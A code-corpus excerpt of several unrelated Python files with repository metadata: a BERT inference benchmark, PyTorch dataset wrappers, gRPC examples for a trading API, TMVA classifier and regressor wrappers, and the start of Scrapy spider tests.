    torch.cuda.synchronize()  # flush pending GPU work so it doesn't skew timing
    started = time.perf_counter()
    output = model.infer(inputs, attn_mask)
    torch.cuda.synchronize()  # wait for the inference kernels to finish
    return output, time.perf_counter() - started
def hf_bert(model, inputs, attn_mask):
    """Run the HuggingFace model on GPU once and return (output, wall-clock seconds)."""
    torch.cuda.synchronize()  # flush pending GPU work so it doesn't skew timing
    started = time.perf_counter()
    output = model(inputs.to("cuda:0"), attention_mask=attn_mask.to("cuda:0"))
    torch.cuda.synchronize()  # wait for the forward pass to finish
    return output, time.perf_counter() - started
def ls_generate(model, inputs_id, attn_mask):
    """Time the LightSeq classifier and print the predicted class ids."""
    print("=========lightseq=========")
    print("lightseq generating...")
    logits, elapsed = ls_bert(model, inputs_id, attn_mask)
    print(f"lightseq time: {elapsed}s")
    print("lightseq results (class predictions):")
    print(logits.argmax(axis=1).detach().cpu().numpy())
def hf_generate(model, inputs_id, attn_mask):
    """Time the HuggingFace classifier and print the predicted class ids."""
    print("=========huggingface=========")
    print("huggingface generating...")
    output, elapsed = hf_bert(model, inputs_id, attn_mask)
    print(f"huggingface time: {elapsed}s")
    print("huggingface results (class predictions):")
    print(output.logits.argmax(axis=1).detach().cpu().numpy())
def warmup(tokenizer, ls_model, hf_model, sentences):
    """Tokenize the warmup sentences and run both models once each."""
    encoded = tokenizer(sentences, return_tensors="pt", padding=True)
    ls_generate(ls_model, encoded["input_ids"], encoded["attention_mask"])
    hf_generate(hf_model, encoded["input_ids"], encoded["attention_mask"])
class LightseqBertClassification:
    """BERT classifier: LightSeq encoder plus the HuggingFace pooler/classifier head."""

    def __init__(self, ls_weight_path, hf_model):
        # 128 is the batch limit passed to the LightSeq runtime — presumably it
        # matches the export configuration; confirm against the weight file.
        self.ls_bert = lsi.Bert(ls_weight_path, 128)
        self.pooler = hf_model.bert.pooler
        self.classifier = hf_model.classifier

    def infer(self, inputs, attn_mask):
        # LightSeq returns a plain array; convert back to a float tensor on GPU.
        hidden = torch.Tensor(self.ls_bert.infer(inputs)).float()
        pooled = self.pooler(hidden.to("cuda:0"))
        return self.classifier(pooled)
def main():
    """
    Benchmark LightSeq against HuggingFace for BERT sequence classification.

    With --user_input, repeatedly reads a sentence from stdin and classifies
    it with both backends; otherwise classifies a fixed sentence list once.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--user_input", action="store_true")
    args = parser.parse_args()
    print("initializing bert tokenizer...")
    tokenizer = BertTokenizer.from_pretrained("bert-base-uncased")
    print("creating huggingface model...")
    hf_model = BertForSequenceClassification.from_pretrained("bert-base-uncased")
    hf_model.to("cuda:0")
    hf_model.eval()
    print("creating lightseq model...")
    # The LightSeq model reuses the HF pooler/classifier head on top of its encoder.
    ls_model = LightseqBertClassification("lightseq_bert_base_uncased.hdf5", hf_model)
    sentences = [
        "Hello, my dog is cute",
        "Hey, how are you",
        "This is a test",
        "Testing the model again",
    ]
    # Warmup run excludes one-time initialization cost from later timings.
    print("====================START warmup====================")
    warmup(tokenizer, ls_model, hf_model, sentences)
    print("====================END warmup====================")
    while True:
        if args.user_input:
            sentences = [input("input the masked sentence:\n")]
        print("tokenizing the sentences...")
        inputs = tokenizer(sentences, return_tensors="pt", padding=True)
        inputs_id = inputs["input_ids"]
        attn_mask = inputs["attention_mask"]
        ls_generate(ls_model, inputs_id, attn_mask)
        hf_generate(hf_model, inputs_id, attn_mask)
        # Without --user_input, run the fixed sentences exactly once.
        if not args.user_input:
            break
if __name__ == "__main__":
    # Script entry point: benchmark LightSeq vs HuggingFace BERT classification.
    main()
| 32.079646 | 86 | 0.670621 |
bbf1146cea0379d8aa5f4bdf3e9a2b009a116e7e | 6,338 | py | Python | dataset.py | SolitaryKnife/pytorch_dataset | 36773064b333d0aafc1c5d0e559271c56516afe7 | [
"MIT"
] | null | null | null | dataset.py | SolitaryKnife/pytorch_dataset | 36773064b333d0aafc1c5d0e559271c56516afe7 | [
"MIT"
] | null | null | null | dataset.py | SolitaryKnife/pytorch_dataset | 36773064b333d0aafc1c5d0e559271c56516afe7 | [
"MIT"
] | null | null | null | from torch.utils.data.dataset import *
class ValueDataset(Dataset):
    """Map-style dataset over an indexable collection, with an optional transform."""

    __slots__ = ["values", "transform"]

    def __init__(self, values, transform=None):
        # `values` must be sequence-like; `transform` (if given) is applied per item.
        assert callable(getattr(values, "__len__", None))
        assert callable(getattr(values, "__getitem__", None))
        assert callable(transform) or transform is None
        self.values = values
        self.transform = transform

    def __len__(self):
        return len(self.values)

    def __getitem__(self, idx):
        item = self.values[idx]
        return item if self.transform is None else self.transform(item)
class ValueIterableDataset(IterableDataset):
    """Iterable-style dataset that lazily applies a transform to each value."""

    __slots__ = ["values", "transform"]

    def __init__(self, values, transform=None):
        # Fix: `from collections import Iterable` raises ImportError on
        # Python >= 3.10 — the ABC lives in `collections.abc`.
        from collections.abc import Iterable
        assert isinstance(values, Iterable)
        assert callable(transform) or transform is None
        self.values = values
        self.transform = transform

    @staticmethod
    def generator(values, transform):
        # An identity transform keeps the yield loop branch-free.
        if transform is None:
            transform = (lambda x: x)
        for v in values:
            yield transform(v)

    def __iter__(self):
        return self.generator(self.values, self.transform)
class ZipDataset(Dataset):
    """Map-style dataset yielding aligned tuples drawn from several datasets."""

    __slots__ = ["datasets", "zip_transform"]

    def __init__(self, datasets, zip_transform=None):
        assert len(datasets) > 0
        for ds in datasets:
            assert callable(getattr(ds, "__len__", None))
            assert callable(getattr(ds, "__getitem__", None))
        assert callable(zip_transform) or zip_transform is None
        self.datasets = datasets
        self.zip_transform = zip_transform

    @property
    def sizes(self):
        # Individual dataset lengths, in the order the datasets were given.
        return tuple(len(ds) for ds in self.datasets)

    def __len__(self):
        # Truncate to the shortest member, like the builtin zip().
        return min(self.sizes)

    def __getitem__(self, idx):
        row = tuple(ds[idx] for ds in self.datasets)
        return row if self.zip_transform is None else self.zip_transform(row)
class ZipIterableDataset(IterableDataset):
    """Iterable dataset zipping several iterables, with an optional tuple transform."""

    __slots__ = ["datasets", "zip_transform"]

    def __init__(self, datasets, zip_transform=None):
        assert len(datasets) > 0
        # Fix: `from collections import Iterable` raises ImportError on
        # Python >= 3.10 — the ABC lives in `collections.abc`.
        from collections.abc import Iterable
        assert all([isinstance(ds, Iterable) for ds in datasets])
        assert callable(zip_transform) or zip_transform is None
        self.datasets = datasets
        self.zip_transform = zip_transform

    @staticmethod
    def generator(datasets, zip_transform):
        # An identity transform keeps the yield loop branch-free.
        if zip_transform is None:
            zip_transform = (lambda x: x)
        for vals in zip(*datasets):
            yield zip_transform(vals)

    def __iter__(self):
        return self.generator(self.datasets, self.zip_transform)
class CombineDataset(Dataset):
    """Map-style cartesian product of several datasets."""

    __slots__ = ["datasets", "comb_transform"]

    def __init__(self, datasets, comb_transform=None, indexer=None):
        assert len(datasets) > 0
        for ds in datasets:
            assert callable(getattr(ds, "__len__", None))
            assert callable(getattr(ds, "__getitem__", None))
        assert callable(comb_transform) or comb_transform is None
        self.datasets = datasets
        self.comb_transform = comb_transform
        # A custom indexer shadows the default static method on this instance.
        if callable(indexer):
            self.indexer = indexer

    @staticmethod
    def indexer(i, sizes):
        # Decode flat index i into mixed-radix coordinates over `sizes`.
        prod = 1
        for s in sizes:
            prod *= s
        coords = []
        for s in sizes:
            prod //= s
            coords.append(i // prod)
            i %= prod
        return tuple(coords)

    @property
    def sizes(self):
        return tuple(len(ds) for ds in self.datasets)

    def __len__(self):
        # Total combinations = product of all member sizes.
        total = 1
        for size in self.sizes:
            total *= size
        return total

    def __getitem__(self, idx):
        coords = self.indexer(idx, self.sizes)
        combo = tuple(ds[i] for i, ds in zip(coords, self.datasets))
        return combo if self.comb_transform is None else self.comb_transform(combo)
class CombineIterableDataset(IterableDataset):
    """Iterable cartesian product (itertools.product order) of several iterables."""

    __slots__ = ["datasets", "comb_transform"]

    def __init__(self, datasets, comb_transform=None, indexer=None):
        # Fix 1: `from collections import Iterable` raises ImportError on
        # Python >= 3.10 — the ABC lives in `collections.abc`.
        # Fix 2: `comb_transform` now defaults to None (tuples pass through),
        # matching every sibling dataset class; passing it remains supported.
        assert len(datasets) > 0
        from collections.abc import Iterable
        assert all([isinstance(ds, Iterable) for ds in datasets])
        assert callable(comb_transform) or comb_transform is None
        self.datasets = datasets
        self.comb_transform = comb_transform
        # Optional custom indexer, kept for API symmetry with CombineDataset.
        if callable(indexer):
            self.indexer = indexer

    @staticmethod
    def generator(datasets, comb_transform):
        # An identity transform keeps the yield loop branch-free.
        if comb_transform is None:
            comb_transform = (lambda x: x)
        from itertools import product
        for vals in product(*datasets):
            yield comb_transform(vals)

    def __iter__(self):
        return self.generator(self.datasets, self.comb_transform)
class AugmentedDataset(IterableDataset):
    """Iterable dataset that expands each value into zero or more outputs."""

    __slots__ = ["values", "augment"]

    def __init__(self, values, augment=None):
        # Fix 1: `from collections import Iterable` raises ImportError on
        # Python >= 3.10 — the ABC lives in `collections.abc`.
        # Fix 2: `augment` now defaults to None (pass-through), matching the
        # other dataset classes; the generator already handled None.
        from collections.abc import Iterable
        assert isinstance(values, Iterable)
        assert callable(augment) or augment is None
        self.values = values
        self.augment = augment

    @staticmethod
    def generator(values, augment):
        # With no augmenter, each value passes through unchanged.
        if augment is None:
            augment = (lambda x: [x])
        for v in values:
            for o in augment(v):
                yield o

    def __iter__(self):
        return self.generator(self.values, self.augment)
class CachedDataset(Dataset):
    """Memoizing wrapper: each item of the wrapped dataset is fetched at most once."""

    __slots__ = ["dataset", "cache"]

    def __init__(self, dataset, cache):
        assert callable(getattr(dataset, "__len__", None))
        assert callable(getattr(dataset, "__getitem__", None))
        # The cache only needs dict-like get/set/contains behaviour.
        for attr in ("__getitem__", "__setitem__", "__contains__"):
            assert callable(getattr(cache, attr, None))
        self.dataset = dataset
        self.cache = cache

    def __len__(self):
        return len(self.dataset)

    def __getitem__(self, idx):
        if idx not in self.cache:
            self.cache[idx] = self.dataset[idx]
        return self.cache[idx]
| 26.518828 | 83 | 0.627643 |
c67617ebe832e48424c4cc75e187674aac96f8fe | 2,042 | py | Python | Examples/Python/api/main.py | LykkeCity/Trading-API | 6d9d7ee07865acc25422b1f86c575857e3cc2cc4 | [
"Apache-2.0"
] | null | null | null | Examples/Python/api/main.py | LykkeCity/Trading-API | 6d9d7ee07865acc25422b1f86c575857e3cc2cc4 | [
"Apache-2.0"
] | 5 | 2020-10-20T06:41:11.000Z | 2021-11-29T21:55:51.000Z | Examples/Python/api/main.py | LykkeCity/Trading-API | 6d9d7ee07865acc25422b1f86c575857e3cc2cc4 | [
"Apache-2.0"
] | 7 | 2020-07-23T09:54:21.000Z | 2022-02-04T06:49:19.000Z | import grpc
import common_pb2
import common_pb2_grpc
import privateService_pb2
import privateService_pb2_grpc
import publicService_pb2
import publicService_pb2_grpc
import google.protobuf
# Channel-level TLS credentials for the public Lykke endpoint.
ssl_credentials = grpc.ssl_channel_credentials()
# Per-call bearer-token auth; replace the placeholder with a real HFT API key.
token_credentials = grpc.access_token_call_credentials("HFT-ACCOUNT-API-KEY")
# Combine TLS and token auth into a single channel credential.
credentials = grpc.composite_channel_credentials(ssl_credentials, token_credentials)
# One secure channel shared by both service stubs below.
channel = grpc.secure_channel("hft-apiv2-grpc.lykke.com:443", credentials)
private_api = privateService_pb2_grpc.PrivateServiceStub(channel)
public_api = publicService_pb2_grpc.PublicServiceStub(channel)
def get_balances():
    """Print the available balance of every asset on the account."""
    response = private_api.GetBalances(google.protobuf.empty_pb2.Empty())
    for item in response.payload:
        print(f"{item.assetId}: {item.available}")
def place_cancel_order():
    """Place a far-from-market sell limit order, then cancel it immediately."""
    order = privateService_pb2.LimitOrderRequest()
    order.assetPairId = "ETHUSD"
    order.side = 1  # 1 == sell
    order.volume = "0.01"
    order.price = "100000"
    placed = private_api.PlaceLimitOrder(order)
    print(f"orderId: {placed.payload.orderId}")
    cancellation = privateService_pb2.CancelOrderRequest()
    cancellation.orderId = placed.payload.orderId
    cancelled = private_api.CancelOrder(cancellation)
    print(f"Order cancel response: {cancelled.payload}")
def get_quotes():
    """Stream price updates for selected asset pairs until interrupted."""
    request = publicService_pb2.PriceUpdatesRequest()
    request.assetPairIds.extend(["BTCUSD", "BTCEUR"])  # or [] for all asset pairs
    stream = public_api.GetPriceUpdates(request)
    try:
        for update in stream:
            print(f"{update.assetPairId} bid: {update.bid}, ask: {update.ask}, timestamp: {update.timestamp.ToDatetime()}")
    except KeyboardInterrupt:
        # Ctrl-C: close the server-side stream cleanly.
        stream.cancel()
def get_trades():
    """Stream the account's trade updates, printing each one."""
    stream = private_api.GetTradeUpdates(google.protobuf.empty_pb2.Empty())
    try:
        for trade in stream:
            print(str(trade))
    except Exception as err:
        # Surface the stream error, then cancel the subscription.
        print(str(err))
        stream.cancel()
# Run one example; uncomment the others to try them.
get_balances()
# place_cancel_order()
# get_quotes()
# get_trades()
| 27.226667 | 113 | 0.77522 |
c1a6b6069286b247c56f516a0555650e9e86849c | 17,743 | py | Python | rep/estimators/tmva.py | HolyBayes/rep | 8a8d70f87e148e6fd73ff0c3a8606e6074a5c47b | [
"Apache-2.0"
] | null | null | null | rep/estimators/tmva.py | HolyBayes/rep | 8a8d70f87e148e6fd73ff0c3a8606e6074a5c47b | [
"Apache-2.0"
] | null | null | null | rep/estimators/tmva.py | HolyBayes/rep | 8a8d70f87e148e6fd73ff0c3a8606e6074a5c47b | [
"Apache-2.0"
] | null | null | null | """
These classes are wrappers for physics machine learning library TMVA used .root format files (c++ library).
Now you can simply use it in python. TMVA contains classification and regression algorithms, including neural networks.
See `TMVA guide <http://mirror.yandex.ru/gentoo-distfiles/distfiles/TMVAUsersGuide-v4.03.pdf>`_
for the list of the available algorithms and parameters.
"""
from __future__ import division, print_function, absolute_import
from abc import ABCMeta
from logging import getLogger
import os
import tempfile
import subprocess
from subprocess import PIPE
import shutil
import sys
from .interface import Classifier, Regressor
from .utils import check_inputs, score_to_proba, proba_to_two_dimensions
from six.moves import cPickle
import signal
__author__ = 'Tatiana Likhomanenko, Alex Rogozhnikov'
logger = getLogger(__name__)
# those parameters that shall not be passed to the options of the TMVA estimators
_IGNORED_PARAMETERS = {'random_state'}
__all__ = ['TMVAClassifier', 'TMVARegressor']
class _AdditionalInformation:
"""
Additional information for the tmva factory (used in training)
"""
def __init__(self, directory, model_type='classification'):
self.directory = directory
self.tmva_root = 'result.root'
self.tmva_job = "TMVAEstimation"
self.model_type = model_type
class _AdditionalInformationPredict:
"""
Additional information for the tmva factory (used to predict new data)
"""
def __init__(self, directory, xml_file, method_name, model_type=('classification', None)):
self.directory = directory
self.xml_file = xml_file
self.method_name = method_name
self.model_type = model_type
self.result_filename = os.path.join(directory, 'dump_predictions.pkl')
class TMVABase(object):
"""
TMVABase is a base class for the tmva classification and regression models.
:param str method: algorithm method (default='kBDT')
:param features: features used in training
:type features: list[str] or None
:param str factory_options: system options, including data transformation before training
:param dict method_parameters: estimator options
.. note:: TMVA doesn't support staged predictions and features importances :(
"""
__metaclass__ = ABCMeta
def __init__(self,
factory_options="",
method='kBDT',
**method_parameters):
self.method = method
self._method_name = 'REP_Estimator'
self.factory_options = factory_options
self.method_parameters = method_parameters
# contents of xml file with formula, read into memory
self.formula_xml = None
@staticmethod
def _create_tmp_directory():
return tempfile.mkdtemp(dir=os.getcwd())
@staticmethod
def _remove_tmp_directory(directory):
shutil.rmtree(directory, ignore_errors=True)
def _fit(self, X, y, sample_weight=None, model_type='classification'):
"""
Train the estimator.
:param pandas.DataFrame X: data shape [n_samples, n_features]
:param y: targets for samples --- array-like of shape [n_samples]
:param sample_weight: weights for samples,
array-like of shape [n_samples] or None if all weights are equal
:return: self
"""
# saving data to 2 different root files.
directory = self._create_tmp_directory()
add_info = _AdditionalInformation(directory, model_type=model_type)
try:
self._run_tmva_training(add_info, X, y, sample_weight)
finally:
self._remove_tmp_directory(directory)
if self.formula_xml is None: self.formula_xml = ''
return self
def _run_tmva_training(self, info, X, y, sample_weight):
"""
Run subprocess to train tmva factory.
:param info: class with additional information
"""
tmva_process = None
_platform = sys.platform
try:
if _platform == 'win32' or _platform == 'cygwin':
tmva_process = subprocess.Popen(
'{executable} -c "import os; from rep.estimators import _tmvaFactory; _tmvaFactory.main()"'.format(
executable=sys.executable),
cwd=info.directory,
stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT)
else:
# Problem with Mac OS El Capitan which is not garanteed to set DYLD_LIBRARY_PATH.
# This DYLD_LIBRARY_PATH can be used in root_numpy for dynamic loading ROOT libraries
# https://github.com/rootpy/root_numpy/issues/227#issuecomment-165981891
tmva_process = subprocess.Popen(
'export DYLD_LIBRARY_PATH={dyld}; cd "{directory}";'
'{executable} -c "import os; from rep.estimators import _tmvaFactory; _tmvaFactory.main()"'.format(
dyld=os.environ.get('DYLD_LIBRARY_PATH', ""),
directory=info.directory,
executable=sys.executable),
stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT,
shell=True, preexec_fn=os.setsid)
try:
cPickle.dump(self, tmva_process.stdin)
cPickle.dump(info, tmva_process.stdin)
cPickle.dump(X, tmva_process.stdin)
cPickle.dump(y, tmva_process.stdin)
cPickle.dump(sample_weight, tmva_process.stdin)
except:
# continuing, next we check the output of process
pass
stdout, stderr = tmva_process.communicate()
assert tmva_process.returncode == 0, \
'ERROR: TMVA process is incorrect finished \n LOG: %s \n %s' % (stderr, stdout)
if stdout is not None:
print('%s' % (stdout))
xml_filename = os.path.join(info.directory, 'weights',
'{job}_{name}.weights.xml'.format(job=info.tmva_job, name=self._method_name))
with open(xml_filename, 'r') as xml_file:
self.formula_xml = xml_file.read()
finally:
if tmva_process is not None:
try:
if _platform == 'win32' or _platform == 'cygwin':
subprocess.call(['taskkill', '/F', '/T', '/PID', str(tmva_process.pid)])
else:
os.killpg(tmva_process.pid, signal.SIGTERM)
except:
pass
def _check_fitted(self):
assert self.formula_xml is not None, "Classifier wasn't fitted, please call `fit` first"
    def _predict(self, X, model_type=('classification', None)):
        """
        Predict data by applying the stored TMVA formula in a subprocess.

        :param pandas.DataFrame X: data shape [n_samples, n_features]
        :param model_type: tuple (classification/regression, type of output transformation)
        :return: predicted values of shape [n_samples]
        """
        self._check_fitted()
        # The trained formula (xml) is written to a temporary file inside a
        # scratch directory; the prediction subprocess reads it from there.
        directory = self._create_tmp_directory()
        try:
            with tempfile.NamedTemporaryFile(mode="w", suffix='.xml', dir=directory, delete=True) as file_xml:
                file_xml.write(self.formula_xml)
                # flush so the subprocess sees the full content before it opens the file
                file_xml.flush()
                add_info = _AdditionalInformationPredict(directory, file_xml.name, self._method_name,
                                                         model_type=model_type)
                prediction = self._run_tmva_predict(add_info, X)
        finally:
            # Always remove the scratch directory, even if prediction failed.
            self._remove_tmp_directory(directory)
        return prediction
@staticmethod
def _run_tmva_predict(info, data):
"""
Run subprocess to predict new data by tmva factory
:param info: class with additional information
"""
tmva_process = None
_platform = sys.platform
try:
if _platform == 'win32' or _platform == 'cygwin':
tmva_process = subprocess.Popen(
'{executable} -c "from rep.estimators import _tmvaReader; _tmvaReader.main()"'.format(
executable=sys.executable),
cwd=info.directory,
stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT)
else:
# Problem with Mac OS El Capitan (10.11) which is not guaranteed to set DYLD_LIBRARY_PATH.
# This DYLD_LIBRARY_PATH can be used in root_numpy for dynamic loading ROOT libraries
# https://github.com/rootpy/root_numpy/issues/227#issuecomment-165981891
tmva_process = subprocess.Popen(
'export DYLD_LIBRARY_PATH={dyld}; cd "{directory}";'
'{executable} -c "from rep.estimators import _tmvaReader; _tmvaReader.main()"'.format(
dyld=os.environ.get('DYLD_LIBRARY_PATH', ""),
directory=info.directory,
executable=sys.executable),
stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT,
shell=True)
try:
cPickle.dump(info, tmva_process.stdin)
cPickle.dump(data, tmva_process.stdin)
except:
# Doing nothing, there is check later.
pass
stdout, stderr = tmva_process.communicate()
assert tmva_process.returncode == 0, \
'ERROR: TMVA process is incorrect finished \n LOG: %s \n %s' % (stderr, stdout)
with open(info.result_filename, 'rb') as predictions_file:
predictions = cPickle.load(predictions_file)
return predictions
finally:
if tmva_process is not None:
try:
if _platform == 'win32' or _platform == 'cygwin':
subprocess.call(['taskkill', '/F', '/T', '/PID', str(tmva_process.pid)])
else:
os.killpg(tmva_process.pid, signal.SIGTERM)
except:
pass
class TMVAClassifier(TMVABase, Classifier):
    """
    Implements classification models from TMVA library: CERN library for machine learning.

    :param str method: algorithm method (default='kBDT')
    :param features: features used in training
    :type features: list[str] or None
    :param str factory_options: system options, including data transformations before training, for example::

        "!V:!Silent:Color:Transformations=I;D;P;G,D"

    :param str sigmoid_function: function which is used to convert TMVA output to probabilities;

        * *identity* (use for svm, mlp) --- do not transform the output, use this value for methods returning class probabilities
        * *sigmoid* --- sigmoid transformation, use it if output varies in range [-infinity, +infinity]
        * *bdt* (for the BDT algorithms output varies in range [-1, 1])
        * *sig_eff=0.4* --- for the rectangular cut optimization methods,
          for instance, here 0.4 will be used as a signal efficiency to evaluate MVA,
          (put any float number from [0, 1])

    :param dict method_parameters: classifier options, example: `NTrees=100`, `BoostType='Grad'`.

    .. warning::
        TMVA doesn't support *staged_predict_proba()* and *feature_importances__*.
        TMVA doesn't support multiclassification, only two-class classification.

    `TMVA guide <http://mirror.yandex.ru/gentoo-distfiles/distfiles/TMVAUsersGuide-v4.03.pdf>`_.
    """

    def __init__(self,
                 method='kBDT',
                 features=None,
                 factory_options="",
                 sigmoid_function='bdt',
                 **method_parameters):
        TMVABase.__init__(self, factory_options=factory_options, method=method, **method_parameters)
        Classifier.__init__(self, features=features)
        self.sigmoid_function = sigmoid_function

    def _set_classes_special(self, y):
        # TMVA supports binary classification only; fail fast otherwise.
        self._set_classes(y)
        assert self.n_classes_ == 2, "Support only 2 classes (data contain {})".format(self.n_classes_)

    def set_params(self, **params):
        """
        Set the parameters of this estimator.

        Known attributes are set directly; any unknown key (not in
        ``_IGNORED_PARAMETERS``) is treated as a TMVA method parameter.

        :param dict params: parameters to set in the model
        """
        for k, v in params.items():
            if hasattr(self, k):
                setattr(self, k, v)
            else:
                if k in _IGNORED_PARAMETERS:
                    continue
                self.method_parameters[k] = v

    def get_params(self, deep=True):
        """
        Get parameters for this estimator.

        :return: dict, parameter names mapped to their values.
        """
        parameters = self.method_parameters.copy()
        parameters['method'] = self.method
        parameters['factory_options'] = self.factory_options
        parameters['features'] = self.features
        # sigmoid_function is a constructor argument and must be reported,
        # otherwise cloning via get_params/__init__ would silently drop it.
        parameters['sigmoid_function'] = self.sigmoid_function
        return parameters

    def fit(self, X, y, sample_weight=None):
        X, y, sample_weight = check_inputs(X, y, sample_weight=sample_weight, allow_none_weights=False)
        X = self._get_features(X).copy()
        self._set_classes_special(y)
        # _set_classes_special guarantees exactly two classes here, so the
        # analysis type is always binary classification (the old multiclass
        # branch was unreachable). Append the option only once so that
        # repeated `fit` calls do not keep growing factory_options.
        if 'AnalysisType=' not in self.factory_options:
            self.factory_options = '{}:AnalysisType=Classification'.format(self.factory_options)
        return self._fit(X, y, sample_weight=sample_weight)

    fit.__doc__ = Classifier.fit.__doc__

    def predict_proba(self, X):
        X = self._get_features(X)
        prediction = self._predict(X, model_type=('classification', self.sigmoid_function))
        return self._convert_output(prediction)

    predict_proba.__doc__ = Classifier.predict_proba.__doc__

    def _convert_output(self, prediction):
        """
        Convert raw TMVA output to per-class probabilities according to
        ``self.sigmoid_function``.

        :param array prediction: predictions which will be converted
        :return: probabilities, two columns (one per class)
        """
        variants = {'bdt', 'sigmoid', 'identity'}
        if 'sig_eff' in self.sigmoid_function:
            return proba_to_two_dimensions(prediction)
        assert self.sigmoid_function in variants, \
            'sigmoid_function parameter must be one of {}, instead of {}'.format(variants, self.sigmoid_function)
        if self.sigmoid_function == 'sigmoid':
            return score_to_proba(prediction)
        elif self.sigmoid_function == 'bdt':
            # BDT output lies in [-1, 1]; rescale it to [0, 1] first.
            return proba_to_two_dimensions((prediction + 1.) / 2.)
        else:
            return proba_to_two_dimensions(prediction)

    def staged_predict_proba(self, X):
        """
        .. warning:: This function is not supported for the TMVA library (**AttributeError** will be thrown)
        """
        raise AttributeError("'staged_predict_proba' is not supported by the TMVA library")
class TMVARegressor(TMVABase, Regressor):
    """
    Implements regression models from TMVA library: CERN library for machine learning.

    :param str method: algorithm method (default='kBDT')
    :param features: features used in training
    :type features: list[str] or None
    :param str factory_options: system options, including data transformations before training, for example::

        "!V:!Silent:Color:Transformations=I;D;P;G,D"

    :param dict method_parameters: regressor options, for example: `NTrees=100`, `BoostType='Grad'`

    .. warning::
        TMVA doesn't support *staged_predict()* and *feature_importances__*.

    `TMVA guide <http://mirror.yandex.ru/gentoo-distfiles/distfiles/TMVAUsersGuide-v4.03.pdf>`_
    """

    def __init__(self,
                 method='kBDT',
                 features=None,
                 factory_options="",
                 **method_parameters):
        TMVABase.__init__(self, factory_options=factory_options, method=method, **method_parameters)
        Regressor.__init__(self, features=features)

    def set_params(self, **params):
        """
        Set the parameters of this estimator.

        Known attributes are set directly; any unknown key (not in
        ``_IGNORED_PARAMETERS``) is treated as a TMVA method parameter.

        :param dict params: parameters to set in the model
        """
        for k, v in params.items():
            if hasattr(self, k):
                setattr(self, k, v)
            else:
                if k in _IGNORED_PARAMETERS:
                    continue
                self.method_parameters[k] = v

    def get_params(self, deep=True):
        """
        Get parameters for this estimator.

        :return: dict, parameter names mapped to their values.
        """
        parameters = self.method_parameters.copy()
        parameters['method'] = self.method
        parameters['factory_options'] = self.factory_options
        parameters['features'] = self.features
        return parameters

    def fit(self, X, y, sample_weight=None):
        X, y, sample_weight = check_inputs(X, y, sample_weight=sample_weight, allow_none_weights=False)
        X = self._get_features(X).copy()
        # Append the analysis type only once so that repeated `fit` calls do
        # not keep growing factory_options with duplicate options.
        if 'AnalysisType=' not in self.factory_options:
            self.factory_options = '{}:AnalysisType=Regression'.format(self.factory_options)
        return self._fit(X, y, sample_weight=sample_weight, model_type='regression')

    fit.__doc__ = Regressor.fit.__doc__

    def predict(self, X):
        X = self._get_features(X)
        return self._predict(X, model_type=('regression', None))

    predict.__doc__ = Regressor.predict.__doc__

    def staged_predict(self, X):
        """
        .. warning:: This function is not supported for the TMVA library (**AttributeError** will be thrown)
        """
        raise AttributeError("'staged_predict' is not supported by the TMVA library")
| 40.976905 | 129 | 0.619963 |
f26da233415b2d91e06f752c11d037acafbcde62 | 17,944 | py | Python | tests/test_spider.py | Maransatto/scrapy | 886513c3751b92e42dcc8cb180d4c15a5a11ccaf | [
"BSD-3-Clause"
] | 3 | 2018-11-13T03:01:17.000Z | 2018-11-13T03:01:20.000Z | tests/test_spider.py | Maransatto/scrapy | 886513c3751b92e42dcc8cb180d4c15a5a11ccaf | [
"BSD-3-Clause"
] | 2 | 2021-09-20T19:54:11.000Z | 2022-03-22T20:43:28.000Z | tests/test_spider.py | Maransatto/scrapy | 886513c3751b92e42dcc8cb180d4c15a5a11ccaf | [
"BSD-3-Clause"
] | 1 | 2021-03-30T13:11:34.000Z | 2021-03-30T13:11:34.000Z | import gzip
import inspect
import warnings
from io import BytesIO
from testfixtures import LogCapture
from twisted.trial import unittest
from scrapy import signals
from scrapy.settings import Settings
from scrapy.http import Request, Response, TextResponse, XmlResponse, HtmlResponse
from scrapy.spiders.init import InitSpider
from scrapy.spiders import Spider, BaseSpider, CrawlSpider, Rule, XMLFeedSpider, \
CSVFeedSpider, SitemapSpider
from scrapy.linkextractors import LinkExtractor
from scrapy.exceptions import ScrapyDeprecationWarning
from scrapy.utils.trackref import object_ref
from scrapy.utils.test import get_crawler
from tests import mock
class SpiderTest(unittest.TestCase):
    """Behavioural tests for the base ``Spider`` class.

    Subclasses override ``spider_class`` to re-run the same checks against
    other spider implementations (InitSpider, XMLFeedSpider, ...).
    """

    spider_class = Spider

    def setUp(self):
        # Make every warning observable so deprecation tests can assert on them.
        warnings.simplefilter("always")

    def tearDown(self):
        warnings.resetwarnings()

    def test_base_spider(self):
        spider = self.spider_class("example.com")
        self.assertEqual(spider.name, 'example.com')
        self.assertEqual(spider.start_urls, [])

    def test_start_requests(self):
        spider = self.spider_class('example.com')
        start_requests = spider.start_requests()
        # start_requests must be lazy (a generator) and empty without start_urls
        self.assertTrue(inspect.isgenerator(start_requests))
        self.assertEqual(list(start_requests), [])

    def test_spider_args(self):
        """Constructor arguments are assigned to spider attributes"""
        spider = self.spider_class('example.com', foo='bar')
        self.assertEqual(spider.foo, 'bar')

    def test_spider_without_name(self):
        """A spider cannot be instantiated without a name"""
        # (docstring fixed: it was copy-pasted from test_spider_args)
        self.assertRaises(ValueError, self.spider_class)
        self.assertRaises(ValueError, self.spider_class, somearg='foo')

    def test_deprecated_set_crawler_method(self):
        spider = self.spider_class('example.com')
        crawler = get_crawler()
        with warnings.catch_warnings(record=True) as w:
            spider.set_crawler(crawler)
            self.assertIn("set_crawler", str(w[0].message))
        self.assertTrue(hasattr(spider, 'crawler'))
        self.assertIs(spider.crawler, crawler)
        self.assertTrue(hasattr(spider, 'settings'))
        self.assertIs(spider.settings, crawler.settings)

    def test_from_crawler_crawler_and_settings_population(self):
        crawler = get_crawler()
        spider = self.spider_class.from_crawler(crawler, 'example.com')
        self.assertTrue(hasattr(spider, 'crawler'))
        self.assertIs(spider.crawler, crawler)
        self.assertTrue(hasattr(spider, 'settings'))
        self.assertIs(spider.settings, crawler.settings)

    def test_from_crawler_init_call(self):
        with mock.patch.object(self.spider_class, '__init__',
                               return_value=None) as mock_init:
            self.spider_class.from_crawler(get_crawler(), 'example.com',
                                           foo='bar')
            mock_init.assert_called_once_with('example.com', foo='bar')

    def test_closed_signal_call(self):
        class TestSpider(self.spider_class):
            closed_called = False

